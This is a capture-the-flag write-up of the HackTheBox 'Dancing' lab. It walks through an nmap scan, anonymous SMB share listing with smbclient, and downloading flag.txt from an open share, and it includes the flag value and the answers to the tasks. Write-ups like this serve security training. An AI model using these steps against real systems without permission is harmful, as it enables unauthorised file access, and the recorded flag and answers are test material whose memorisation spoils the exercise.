Dancing is a very impressive challenge by HackTheBox for pacticing hacking skills. If you want Video Solution the visit the following video for English Version
And for Hindi Version(हिंदी में)
Now let’s continue our writeup.
Fire up the terminal and scan the target like
wesecure1337@kali:~$ nmap -sV {target_ip}
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-23 11:21 IST
Nmap scan report for target_ip
Host is up (0.28s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.25 seconds
From the scan results we came to some valuable outputs
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsNow, simple google search brings us to the
TASK 1What does the 3-letter acronym SMB stand for?
Server Message Block
From our scan results can see that microsoft-ds is running on port 445
TASK 2What port does SMB use to operate at?
445
The scan result shows the service name
TASK 3What is the service name for port 445 that came up in our Nmap scan?
microsoft-ds
To list the contents of the share -L flag is used in SMB tool
TASK 4What is the 'flag' or 'switch' we can use with the SMB tool to 'list' the contents of the share?
-L
Now let’s use smbclient to connect to SMB
wesecure1337@kali:~$ smbclient -L //{target_ip}}
Password for [WORKGROUP\wesecure1337]:Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.149.40 failed (Error NT_STATUS_RESOURCE_NAME_
Unable to connect with SMB1 -- no workgroup available
When prompted for password, just press Enter , it will list the shares
Now we have shares, after trying to connect to shares, only WorkShares is accessible
wesecure1337@kali:~$ smbclient //10.129.149.40/WorkShares
Password for [WORKGROUP\naveen]:
Try "help" to get a list of possible commands.
smb: \>This brings us to
TASK 5What is the name of the share we are able to access in the end with a blank password?
WorkShares
Let’s dig what inside
smb: \> ls
. D 0 Mon Mar 29 13:52:01 2021
.. D 0 Mon Mar 29 13:52:01 2021
Amy.J D 0 Mon Mar 29 14:38:24 2021
James.P D 0 Thu Jun 3 14:08:03 20215114111 blocks of size 4096. 1753130 blocks available
smb: \> cd James.P
smb: \James.P\>
smb: \James.P\> ls
. D 0 Thu Jun 3 14:08:03 2021
.. D 0 Thu Jun 3 14:08:03 2021
flag.txt A 32 Mon Mar 29 14:56:57 20215114111 blocks of size 4096. 1752618 blocks available
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \James.P\>exitwesecure1337@kali:~$ ls
flag.txt
wesecure1337@kali:~$ cat flag.txt
5f61c10dffbc77a704d76016a22f1664
Here get command is used to get the flag.txt file to our local machine.
Now
TASK 6What is the command we can use within the SMB shell to download the files we find?
get
And finally submit flag to complete the Challenge
SUBMIT FLAG
Submit root flag
5f61c10dffbc77a704d76016a22f1664Voila! We have completed the Dancing challenge by HackTheBox. If you really enjoyed the Writeup and excited, do checkout our other Writeups[Walkthrough].
Let’s get connected
Twitter: proton_sec
GitHub: proton-sec
LinkedIn: protonsec
If you want to appreciate and support my work here you go…
Thanks for Reading!!!
